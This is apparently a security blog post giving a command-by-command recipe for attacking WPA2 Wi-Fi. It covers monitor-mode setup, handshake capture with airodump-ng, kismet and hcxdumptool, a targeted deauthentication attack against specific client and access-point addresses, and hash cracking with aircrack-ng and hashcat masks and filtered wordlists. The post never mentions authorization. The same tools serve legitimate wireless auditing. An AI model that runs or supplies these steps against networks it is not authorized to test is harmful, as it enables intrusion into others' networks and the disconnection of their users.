Published
- 4 min read
Bread and Butter Wifi Attacks and Hash Cracking
Bread and Butter Wifi Attacks and Hash Cracking
Wi-Fi cracking is a fundamental skill. We’re looking at the Aircrack-ng suite, alongside other tools that developed the state-of-the-art… art of wpa2
hash capturing and cracking.
Aircrack-ng Setup
We’re gonna work with root
permissions most of the time.
$ sudo -i
For those using the RTL8812AU chipset, installing the driver is straightforward.
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au
$ make install
Managing Drivers
Removing and reinstalling network drivers can often resolve issues with device compatibility.
$ dpkg -r realtek-rtl88xxau-dkms
$ dpkg -r realtek-rtl8814au-dkms
Repo Drivers
Be careful when going with drivers from the repos
- most of the time you’ll end up in more trouble.
$ apt install realtek-rtl88xxau-dkms
$ apt install btscanner aircrack-ng kismet
$ pip3 install kismet_rest deepdiff
Device Configuration
Before launching any attacks, confirm that your network devices are properly recognized and configured:
$ dmesg | grep 88xx
$ iwconfig
More useful commands
$ lsmod
$ blkid
$ lsblk
$ lsusb
Process Management
We noticed better success rate when killing the processes like this, instead of the airmon-way… this might be system or adapter specific.
$ killall wpa-supplicant NetworkManager
Alternatively, you can use airmon-ng to manage interfering processes.
$ airmon-ng check kill
Initiating Monitor Mode
Monitor mode is essential for capturing packets.
$ airmon-ng start wlan0 wlan1
Dumping Hashes
Kismet
Kismet allows for detailed network scanning using multiple adapters.
$ kismet -c wlan0 -c wlan1
airodump-ng
The defacto standard still works great - even though more sophisticated tools are available today.
$ airodump-ng -o dump01 wlan0,wlan1 --output-format pcap
More useful params
--essid MyWifiAP
--bssid ...
-b abg (bands 2.4/5Ghz)
-c 1 (channel)
--essid-regex ".*Vag\|VAG\|vag{1}.*"
-d "CIA Surveillance Van"
-t OPN
hc-tools
hcxdumptool
For more targeted attacks, tools like hcxdumptool
are useful for capturing newer types of hashes. However, pkmid usage is rare, so you might not get what you expect. We found little to no noticeable advantage when dumping directly with hcx tools over using airodump - this may of course be region / target dependent.
We’re still very happy about the development of hcx tools as well as overall progress in Wifi dumping / cracking tools.
$ hcxdumptool -i wlan0 -o dump02.pcapng
Converting capture files
for processing with hashcat
.
$ apt install hcxtools
$ hcxpcapngtool -o pcapng_hashes *.cap
Deauthentication Attacks
A simple deauthentication attack can disconnect clients from their access points:
$ aireplay-ng --deauth 200 -a BA:A2:34:22:E7:68 -c 6D:A7:EC:3A:47:58 wlan0
Cracking Hashes
Using Aircrack-ng for local cracking is straightforward but can be slow:
aircrack-ng
$ aircrack-ng dump.pcap -w wordlist.txt
Hashcat
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i --increment-min=3 -1 ?l?d -2 ?u?l?d hashes.pcapng rockyou.txt ?2?1?1?1?s?s
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i -1 "?l?d!_-+*$" hashes.pcapng wpa2_ultimate.txt ?1?1?1?1
Display SSIDs
https://github.com/Network-Sec/bin-tools-pub/blob/main/hashdump_to_ssid.py
We made a little bin tool
to display SSIDs from hashdump files.
EAPOL
Capturing the complete 4-way handshake including EAPOL isn’t as important as hcxpcapngtool
and some hashcat
forum post may make it sound like. airodump-ng
in certain scenarios still delievers, in certain scenarios even faster and better than hcxdumptool
.
The conversion will work besides the tool complaining and the resulting hashes are the same. Of course, the PKMID
attack is a different story, but since it’s finding many modern routers have been patched and are no longer vulnerable to this attack, while we still can capture WPA2
hashes the traditional way.
Tshark and Tcpdump
Don’t skip learning about Tshark and Tcpdump. They will deliver much needed insights, “how this works” and also provide you with easy methods to do manually what hcxcapngtool
can do, with custom options to choose.
Wordlists
specific for Wifi. We created couple of Wordlist Generator helper tools, you can find them in our GitHub:
https://github.com/Network-Sec/Wordlists
More Wordlist resources:
- https://github.com/vladimircicovic/wifi_pass
- https://github.com/kennyn510/wpa2-wordlists
- https://github.com/victorpreston/bruteX/ (Including Python Wifi Bruteforce tool)
Important:
We can get a massive speed and success rate gain, if we exclude words shorter than 8 chars, as this is the min length for WPA2.
$ cat rockyou.txt | grep --binary-files=text -Pe "^[\w\d\s]{8,32}$" | sort -u > wifi_rockyou.txt
Next Up
We’ll follow up with a dedicated article abouth Hash Cracking Strategies, an applied field manual of modern techniques, that help you to tackle hashes, which are more difficult than top-10000-wordlist passwords or 7 random chars.
Conclusion
“Welcome to the 21st Century. Where sex is free, but love is expensive. Where Pizza arrives faster than an Ambulance and a Smartphone is more important than dignity.”
“Welcome to the darkness, where lying
is modern, treason is smart and poverty a flaw.”